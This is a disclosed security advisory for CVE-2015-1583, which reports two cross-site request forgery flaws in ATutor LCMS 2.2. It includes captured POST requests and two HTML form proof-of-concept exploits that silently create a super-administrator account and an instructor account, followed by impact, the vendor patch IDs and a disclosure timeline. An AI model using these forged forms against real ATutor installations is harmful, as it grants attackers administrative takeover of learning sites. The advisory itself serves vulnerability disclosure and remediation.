[CVE-2015-1583] ATutor LCMS – CSRF Vulnerability in Version 2.2

[CVE-2015-1583] ATutor LCMS – CSRF Vulnerability in Version 2.2


Product Information:

Software: ATutor LCMS

Tested Version: 2.2, released 25.8.2014

Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)

Download link: http://atutor.ca/atutor/download.php

Description: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. (copied from http://www.atutor.ca/credits.php#whatatutor)


Issues:

1) CSRF in administrator creation page

2) CSRF in user creation page


Vulnerability description:

1) CSRF in administrator creation page

When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server:

POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 187
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=pr6jq1tlfr204nm60p5rtbj0u4; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132

form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csrfadmin9&password=&confirm_password=&real_name=&[email protected]&priv_admin=1&submit=Save

By executing the following Proof-of-Concept, a new administrative user called “csrfadmin99” will be created with the password “1qazXSW@”.

<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php" method="POST">
    <input name="form_password_hidden" type="hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
    <input name="login" type="hidden" value="csrfadmin99" />
    <input name="real_name" type="hidden" value="csrfadmin99" />
    <input name="email" type="hidden" value="[email protected]" />
    <input name="priv_admin" type="hidden" value="1" />
    <input name="submit" type="hidden" value="Save" />
    <input type="submit" value="Submit request" />
</form>

2) CSRF in user creation page

When an authenticated administrative user of ATutor LCMS is creating an user, the following POST request is sent to the server:

POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 429
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=0h3qqin6ndjmpt21m7f17i07l7; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132

ml=&password_error=&form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94®istration_token=19569b3551f19d60ddfbe4973d1733079f775568&login=csrfuser9&form_password1=&form_password2=&[email protected]&private_email=1&[email protected]&first_name=csrfuser9&second_name=&last_name=csrfuser9&id=&status=3&old_status=&year=&month=&day=&address=&postal=&city=&province=&country=&phone=&website=&submit=+Save+

By executing the following Proof-of-Concept, a new instructor user called “csrfuser99” will be created with the password “1qazXSW@”.

<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php" method="POST">
    <input name="form_password_hidden" type="hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
    <input name="login" type="hidden" value="csrfuser99" />
    <input name="email" type="hidden" value="[email protected]" />
    <input name="private_email" type="hidden" value="1" />
    <input name="email2" type="hidden" value="[email protected]" />
    <input name="first_name" type="hidden" value="csrfuser99" />
    <input name="last_name" type="hidden" value="csrfuser99" />
    <input name="status" type="hidden" value="3" />
    <input name="submit" type="hidden" value="Save" />
    <input type="submit" value="Submit request" />
</form>

Impact:

1) An attacker is able to create an administrator account with super administrator privilege.

2) An attacker is able to create an user account with instructor privilege.


Solution:

Update using the in-built patcher, Patch ID 0009 and 0011.


Timeline:

Vulnerability found: 10.2.2015 & 28.2.2015

Vendor informed: 10.2.2015 & 28.2.2015

Response by vendor: 11.2.2015 & 28.2.2015

Fix by vendor 23.2.2015 & 28.2.2015

Public Advisory: 1.3.2015


This advisory is also available on securityfocus.